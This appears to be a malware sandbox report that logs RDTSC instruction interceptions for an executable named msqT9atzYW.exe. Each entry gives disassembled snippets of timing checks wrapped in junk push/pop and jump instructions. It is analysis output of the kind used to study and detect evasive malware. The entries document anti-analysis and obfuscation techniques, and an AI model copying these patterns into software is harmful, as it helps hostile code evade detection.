Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EC9B03 second address: EC9B27 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F43C9098CFAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EC9854 second address: EC985A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EC985A second address: EC985E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EC985E second address: EC9862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EC9862 second address: EC986E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F43C9098CE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EC986E second address: EC9874 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: ED44B9 second address: ED44DC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F43C9098CF8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EDC813 second address: EDC819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EDC819 second address: EDC81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EDC81D second address: EDC83B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0083h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EE9054 second address: EE905D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EEA6E2 second address: EEA6E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EEA6E6 second address: EEA6EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EEA6EB second address: EEA6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EEA6F8 second address: EEA6FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EEA6FE second address: EEA704 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EED861 second address: EED86A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EED86A second address: EED871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: EED580 second address: EED584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F06F0C second address: F06F37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43C8AE0087h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F06F37 second address: F06F7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF9h 0x00000007 jg 00007F43C9098CE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007F43C9098CE8h 0x00000015 push edi 0x00000016 pop edi 0x00000017 pushad 0x00000018 jmp 00007F43C9098CF3h 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F06F7C second address: F06F8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F43C8AE0076h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F05E80 second address: F05E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F05E84 second address: F05E9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F43C8AE007Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F0643D second address: F06441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F06441 second address: F06445 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F06445 second address: F06455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F43C9098CEAh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F06455 second address: F0645C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F06985 second address: F06989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F06989 second address: F0699B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F0699B second address: F069B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F43C9098CF1h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F069B8 second address: F069BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F069BC second address: F069C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: F06C6D second address: F06C73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5410033 second address: 541003A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, 22h 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 541003A second address: 5410040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5410040 second address: 5410077 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov si, AB49h 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 jmp 00007F43C9098CF4h 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5410077 second address: 541007B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 541007B second address: 541007F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 541007F second address: 5410085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0E64 second address: 53F0E85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43C9098CEDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0E85 second address: 53F0EA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 mov bh, 17h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F43C8AE0080h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0EA2 second address: 53F0EC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43C9098CF5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0EC9 second address: 53F0ED9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE007Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0ED9 second address: 53F0F12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F43C9098CF7h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F43C9098CF5h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5430F2B second address: 5430F3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE007Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5430F3A second address: 5430F3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5430F3E second address: 5430F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5430F4E second address: 5430F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5430F52 second address: 5430F56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5430F56 second address: 5430F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5430F5C second address: 5430F62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5430F62 second address: 5430F66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D008F second address: 53D00F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F43C8AE007Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov esi, edx 0x00000013 pushfd 0x00000014 jmp 00007F43C8AE007Dh 0x00000019 sub ah, FFFFFFC6h 0x0000001c jmp 00007F43C8AE0081h 0x00000021 popfd 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F43C8AE0088h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D00F8 second address: 53D0107 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D0185 second address: 53D018B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53D018B second address: 53D0190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0C2C second address: 53F0C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0C32 second address: 53F0C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0C36 second address: 53F0C3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0C3A second address: 53F0C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a mov si, 5469h 0x0000000e jmp 00007F43C9098CF6h 0x00000013 popad 0x00000014 mov dword ptr [esp], ebp 0x00000017 jmp 00007F43C9098CF0h 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F43C9098CF7h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0C8D second address: 53F0CA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 340672BAh 0x00000008 mov dh, 00h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F073B second address: 53F0764 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov ax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007F43C9098CEAh 0x00000012 mov dword ptr [esp], ebp 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F43C9098CECh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0656 second address: 53F065C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F065C second address: 53F0693 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F43C9098CEBh 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F43C9098CF0h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0693 second address: 53F0697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0697 second address: 53F069D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F069D second address: 53F06A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F06A3 second address: 53F06DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F43C9098CF7h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F06DC second address: 53F06E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F06E2 second address: 53F06E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F03F4 second address: 53F0436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F43C8AE0081h 0x00000008 pop esi 0x00000009 call 00007F43C8AE0081h 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ebx, esi 0x00000016 popad 0x00000017 mov dword ptr [esp], ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F43C8AE007Eh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0436 second address: 53F0450 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 movsx ebx, cx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0450 second address: 53F046E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0083h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F046E second address: 53F0472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 53F0472 second address: 53F0478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5400225 second address: 5400247 instructions: 0x00000000 rdtsc 0x00000002 mov di, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F43C9098CF7h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5400247 second address: 540026B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 540026B second address: 5400285 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5400285 second address: 54002E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, B5E4h 0x00000007 pushfd 0x00000008 jmp 00007F43C8AE007Dh 0x0000000d sub ah, 00000026h 0x00000010 jmp 00007F43C8AE0081h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007F43C8AE0083h 0x00000022 call 00007F43C8AE0088h 0x00000027 pop esi 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 54002E3 second address: 5400313 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov esi, 7651E4EDh 0x00000011 mov esi, 05F4E2E9h 0x00000016 popad 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F43C9098CEBh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5400313 second address: 5400318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5430DF7 second address: 5430DFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 541027F second address: 5410285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5410285 second address: 54102B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F43C9098CF5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 54102B6 second address: 54102BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 54102BC second address: 54102C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 54102C0 second address: 5410303 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0083h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F43C8AE0089h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F43C8AE007Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5410303 second address: 541034B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43C9098CF7h 0x00000009 sbb ecx, 1C3A5D0Eh 0x0000000f jmp 00007F43C9098CF9h 0x00000014 popfd 0x00000015 mov ah, BAh 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 541034B second address: 541034F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 541034F second address: 5410355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 5410355 second address: 541035B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 541035B second address: 541035F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: 541035F second address: 541039D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F43C8AE0088h 0x00000017 rdtsc
